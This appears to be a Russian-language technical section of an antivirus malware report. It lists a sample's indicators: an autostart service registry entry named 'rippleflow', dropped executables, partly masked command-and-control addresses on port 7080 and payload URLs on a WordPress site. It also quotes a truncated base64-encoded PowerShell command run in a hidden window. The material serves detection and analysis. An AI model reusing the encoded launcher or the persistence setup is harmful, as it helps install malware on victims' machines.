Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\rippleflow] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\rippleflow] 'ImagePath' = '"%WINDIR%\SysWOW64\rippleflow.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAWgB3AGoAYgB2AGYAaQBiAHUAagAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBXAGoAaQBhAHkAbgBqAGEAdQBrAHAAIAAjAD4AIAAkAFQAYwBvAG0AeABjAHMAaABuAD0AJwBUAHQAZAB4A...
- %HOMEPATH%\798.exe
- %HOMEPATH%\798.exe в %WINDIR%\syswow64\rippleflow.exe
- '96.##.84.254':7080
- http://www.gp###rea.org/wp-includes/2rq8ia-18lgf51-219909277/
- http://96.##.84.254:7080/dma/teapot/
- DNS ASK gp###rea.org
- '%HOMEPATH%\798.exe'
- '%WINDIR%\syswow64\rippleflow.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAWgB3AGoAYgB2AGYAaQBiAHUAagAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBXAGoAaQBhAHkAbgBqAGEAdQBrAHAAIAAjAD4AIAAkAFQAYwBvAG0AeABjAHMAaABuAD0AJwBUAHQAZAB4A...' (со скрытым окном)